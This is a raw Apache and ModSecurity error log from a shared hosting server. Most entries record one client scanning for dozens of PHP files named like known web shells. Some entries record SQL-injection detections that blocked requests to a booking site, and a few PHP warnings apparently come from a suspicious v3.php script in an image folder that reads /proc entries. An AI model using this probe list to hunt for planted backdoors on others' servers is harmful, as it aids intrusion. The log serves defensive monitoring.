[Tue May 12 03:47:03.589899 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/xb.php
[Tue May 12 03:47:03.937254 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/ova.php
[Tue May 12 03:47:04.317740 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/vx.php
[Tue May 12 03:47:04.630281 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/rh.php
[Tue May 12 03:47:05.039696 2026] [:error] [pid 1730207:tid 1730233] [client 52.242.216.199:7281] File does not exist: /home/piregwan/public_html/webindex.php
[Tue May 12 03:47:30.162973 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/class-t.api.php
[Tue May 12 03:47:30.427491 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/zwso.php
[Tue May 12 03:47:30.981009 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/class19.php
[Tue May 12 03:47:31.222383 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/class20.php
[Tue May 12 03:47:31.538936 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/admin.php
[Tue May 12 03:47:31.807773 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/randkeyword.php
[Tue May 12 03:47:32.106522 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/fwe.php
[Tue May 12 03:47:32.615044 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/g.php
[Tue May 12 03:47:32.879986 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/tx1.php
[Tue May 12 03:47:33.125676 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/xv.php
[Tue May 12 03:47:33.395134 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/x56.php
[Tue May 12 03:47:33.638255 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/htaccess.php
[Tue May 12 03:47:33.940798 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/readme.php
[Tue May 12 03:47:34.064131 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42440] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGtrvMumyrWMfSu7q7EwAAAMQ"]
[Tue May 12 03:47:34.064351 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGtrvMumyrWMfSu7q7EwAAAMQ"]
[Tue May 12 03:47:34.181024 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/x50.php
[Tue May 12 03:47:34.451385 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/fv.php
[Tue May 12 03:47:34.855781 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/file.php
[Tue May 12 03:47:35.151926 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/lsd.php
[Tue May 12 03:47:35.225842 2026] [security2:error] [pid 1709071:tid 1709091] [client 172.104.186.23:42440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGtrvMumyrWMfSu7q7EwAAAMQ"]
[Tue May 12 03:47:35.494932 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/as.php
[Tue May 12 03:47:35.945218 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/wsd.php
[Tue May 12 03:47:36.202801 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/gtc.php
[Tue May 12 03:47:36.447449 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/atx.php
[Tue May 12 03:47:36.749593 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/z60.php
[Tue May 12 03:47:37.074744 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/403.php
[Tue May 12 03:47:37.318224 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/m.php
[Tue May 12 03:47:37.659899 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/themes.php
[Tue May 12 03:47:38.167201 2026] [security2:error] [pid 1707624:tid 1707704] [client 43.165.7.132:38336] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKGurOxS7i6i_mT2NLargAAAFY"]
[Tue May 12 03:47:38.592062 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/click.php
[Tue May 12 03:47:38.836050 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/install.php
[Tue May 12 03:47:39.251909 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/lv.php
[Tue May 12 03:47:39.499585 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/simple.php
[Tue May 12 03:47:39.953899 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/css.php
[Tue May 12 03:47:40.315049 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/cong.php
[Tue May 12 03:47:40.895264 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/cong.php
[Tue May 12 03:47:41.249263 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/w.php
[Tue May 12 03:47:41.510677 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/404.php
[Tue May 12 03:47:41.641541 2026] [security2:error] [pid 1691274:tid 1691284] [client 172.104.186.23:42824] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/migrate"] [unique_id "agKGvVfdQaraX_prmqcwMwAAAAc"]
[Tue May 12 03:47:41.641752 2026] [security2:error] [pid 1691274:tid 1691284] [client 172.104.186.23:42824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/migrate"] [unique_id "agKGvVfdQaraX_prmqcwMwAAAAc"]
[Tue May 12 03:47:41.641948 2026] [security2:error] [pid 1691274:tid 1691284] [client 172.104.186.23:42824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGvVfdQaraX_prmqcwMwAAAAc"]
[Tue May 12 03:47:41.826673 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/ioxi-o.php
[Tue May 12 03:47:42.200422 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/0x.php
[Tue May 12 03:47:42.444665 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/css.php
[Tue May 12 03:47:42.866226 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/222.php
[Tue May 12 03:47:43.450624 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/admin.php
[Tue May 12 03:47:43.959398 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/classwithtostring.php
[Tue May 12 03:47:44.201195 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/abcd.php
[Tue May 12 03:47:44.534181 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/autoload_classmap.php
[Tue May 12 03:47:44.804939 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/inputs.php
[Tue May 12 03:47:45.270738 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/about.php
[Tue May 12 03:47:45.517591 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/alfa.php
[Tue May 12 03:47:47.062370 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/manager.php
[Tue May 12 03:47:47.452163 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/item.php
[Tue May 12 03:47:48.108715 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/404.php
[Tue May 12 03:47:48.437722 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/mail.php
[Tue May 12 03:47:49.065253 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/sx.php
[Tue May 12 03:47:49.563740 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/alfa.php
[Tue May 12 03:47:49.805543 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/1.php
[Tue May 12 03:47:50.067467 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/byp.php
[Tue May 12 03:47:50.313144 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/wp-trackback.php
[Tue May 12 03:47:50.595368 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/.well-known/index.php
[Tue May 12 03:47:51.363117 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/gmo.php
[Tue May 12 03:47:52.109373 2026] [security2:error] [pid 1695975:tid 1695989] [client 43.164.129.191:45504] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/wp/v2/pages/158"] [unique_id "agKGyNVI9ymHBxup74-dUwAAAIs"]
[Tue May 12 03:47:54.717590 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/ww1.php
[Tue May 12 03:47:55.849162 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/.well-known/acme-challenge/index.php
[Tue May 12 03:47:56.511941 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/security.php
[Tue May 12 03:47:58.404673 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/.well-known/admin.php
PHP Warning:  filesize(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:47:59.844058 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/.well-known/log.php
[Tue May 12 03:48:00.091939 2026] [:error] [pid 1707624:tid 1707689] [client 52.242.216.199:7270] File does not exist: /home/piregwan/public_html/class.php
[Tue May 12 03:48:01.191384 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/bless5.php
[Tue May 12 03:48:02.028242 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/lock360.php
[Tue May 12 03:48:02.135473 2026] [security2:error] [pid 1707624:tid 1707704] [client 43.157.158.178:46714] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Pour-un-cirque-extrait-3.mp3"] [unique_id "agKG0rOxS7i6i_mT2NLbDwAAAFY"]
[Tue May 12 03:48:02.378289 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/f35.php
[Tue May 12 03:48:02.613215 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ioxi-o1.php
[Tue May 12 03:48:02.878802 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/juuuu.php
[Tue May 12 03:48:03.151439 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ha.php
[Tue May 12 03:48:03.413735 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/gg.php
[Tue May 12 03:48:03.700216 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/we2.php
[Tue May 12 03:48:04.052958 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/04.php
[Tue May 12 03:48:04.300721 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/333.php
[Tue May 12 03:48:04.620391 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/520.php
[Tue May 12 03:48:04.902363 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ar.php
[Tue May 12 03:48:05.143868 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/x.php
[Tue May 12 03:48:05.506907 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/xx.php
[Tue May 12 03:48:06.012274 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/gifclass4.php
[Tue May 12 03:48:06.457670 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/2clas.php
[Tue May 12 03:48:06.691234 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ave.php
[Tue May 12 03:48:06.951925 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/wrt.php
[Tue May 12 03:48:07.186330 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/bibil.php
[Tue May 12 03:48:07.474640 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/radio.php
[Tue May 12 03:48:07.824009 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/files.php
[Tue May 12 03:48:07.873737 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:46196] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG1zue9Sp-pIv_Bb6h-wAAAUA"]
[Tue May 12 03:48:07.873946 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:46196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG1zue9Sp-pIv_Bb6h-wAAAUA"]
[Tue May 12 03:48:08.057356 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/file7.php
[Tue May 12 03:48:08.293004 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/gifclass.php
[Tue May 12 03:48:08.793467 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/nox.php
[Tue May 12 03:48:09.020725 2026] [security2:error] [pid 1730207:tid 1730209] [client 172.104.186.23:46196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKG1zue9Sp-pIv_Bb6h-wAAAUA"]
[Tue May 12 03:48:09.027683 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/file48.php
[Tue May 12 03:48:09.371111 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/info.php
[Tue May 12 03:48:09.788786 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/class9.php
[Tue May 12 03:48:10.070533 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/la.php
[Tue May 12 03:48:10.338877 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/bless11.php
[Tue May 12 03:48:10.606790 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ccou.php
[Tue May 12 03:48:10.842351 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ton.php
[Tue May 12 03:48:11.077710 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/403.php
[Tue May 12 03:48:11.320813 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/file9.php
[Tue May 12 03:48:11.557358 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ac.php
[Tue May 12 03:48:11.798387 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/new4.php
[Tue May 12 03:48:12.029586 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/pop.php
[Tue May 12 03:48:12.268456 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/az.php
[Tue May 12 03:48:12.518273 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/xaz.php
[Tue May 12 03:48:12.813221 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/up4.php
[Tue May 12 03:48:13.155073 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/1aa.php
[Tue May 12 03:48:13.408764 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/elp.php
[Tue May 12 03:48:13.738536 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/wtz.php
[Tue May 12 03:48:13.977742 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/galex.php
[Tue May 12 03:48:14.211053 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/xb.php
[Tue May 12 03:48:14.448106 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/ova.php
[Tue May 12 03:48:14.747190 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/vx.php
[Tue May 12 03:48:14.987098 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/rh.php
[Tue May 12 03:48:15.410344 2026] [:error] [pid 1691274:tid 1691295] [client 52.242.216.199:7253] File does not exist: /home/piregwan/public_html/webindex.php
[Tue May 12 03:48:15.950959 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.104.186.23:54460] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/portal"] [unique_id "agKG33o6NvB9WXx5V-6NFgAAAQk"]
[Tue May 12 03:48:15.951158 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.104.186.23:54460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/portal"] [unique_id "agKG33o6NvB9WXx5V-6NFgAAAQk"]
